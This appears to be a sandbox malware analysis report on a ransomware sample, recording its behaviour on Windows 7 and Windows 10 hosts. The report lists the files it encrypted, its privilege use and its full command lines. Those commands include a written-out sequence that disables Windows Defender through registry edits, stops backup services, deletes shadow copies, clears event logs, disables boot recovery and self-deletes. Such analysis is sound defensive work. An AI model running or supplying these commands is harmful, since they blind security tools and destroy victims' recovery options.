| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Groove.en-us\SETUP.XML.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe
"C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\xG7b_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/864-54-0x000007FEFBCC1000-0x000007FEFBCC3000-memory.dmp
memory/2160-58-0x000007FEF2D70000-0x000007FEF38CD000-memory.dmp
memory/2160-59-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
memory/2160-60-0x0000000002940000-0x0000000002942000-memory.dmp
memory/2160-61-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
memory/2160-63-0x0000000002944000-0x0000000002947000-memory.dmp
memory/2160-62-0x0000000002942000-0x0000000002944000-memory.dmp
memory/2160-64-0x000000001B800000-0x000000001BAFF000-memory.dmp
memory/2160-65-0x000000000294B000-0x000000000296A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b102721d6355040dc3d7ee11dd2255dd |
| SHA1 | f533407d0c30e440bcf0c6b15bced87b26b9be1d |
| SHA256 | dd9233f5e75c8e191c2d7ae218324b349b4911a6594451fa281e33e365658112 |
| SHA512 | 75aa21fb71a0fac205b5c3a04540168c11fe558c36e51cb27b1bc2feb4963b3457c4c38b931d8b583ed3fc67807eeee1b3efce2e6fa2a4d666e30b7c246db78c |
memory/2260-68-0x000007FEF23D0000-0x000007FEF2F2D000-memory.dmp
memory/2260-69-0x000007FEF4840000-0x000007FEF51DD000-memory.dmp
memory/2260-70-0x00000000028C0000-0x00000000028C2000-memory.dmp
memory/2260-71-0x000000001B7B0000-0x000000001BAAF000-memory.dmp
memory/2260-72-0x000007FEF4840000-0x000007FEF51DD000-memory.dmp
memory/2260-74-0x00000000028C2000-0x00000000028C4000-memory.dmp
memory/2260-73-0x00000000028CB000-0x00000000028EA000-memory.dmp
memory/2260-75-0x00000000028C4000-0x00000000028C7000-memory.dmp
C:\xG7b_HOW_TO_DECRYPT.txt
| MD5 | aa414baba021f7fdd6ee55bdcb0c0432 |
| SHA1 | 78362d2ec5cb8bbf597cdd790fabdcb7259f922d |
| SHA256 | c59cbc656a9c03be6da5e0f7af8fec073e5227cb8b4986daf7eb0468cec54faf |
| SHA512 | da33e6a2e561e2b74acd4e24e83a3834a917a167154926a6d24b58b93f6515c4c7ae4a0476baa27876b7990d6fb6e38c7a413bb0c7a7effd56d75ee6fdde73fc |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-20 00:34
Reported
2022-03-20 01:05
Platform
win10v2004-en-20220113
Max time kernel
185s
Max time network
660s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\adovbs.inc | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_CgAAAAoAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_zh_CN.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_FAAAABQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\adcjavas.inc | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\US_export_policy.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_NAAAADQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\RELEASE-NOTES.html.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_EAAAABAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_CgAAAAoAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hi.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.c.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_MgAAADIAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_LAAAACwAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_DgAAAA4AAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\VERSION.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_JgAAACYAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_FAAAABQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
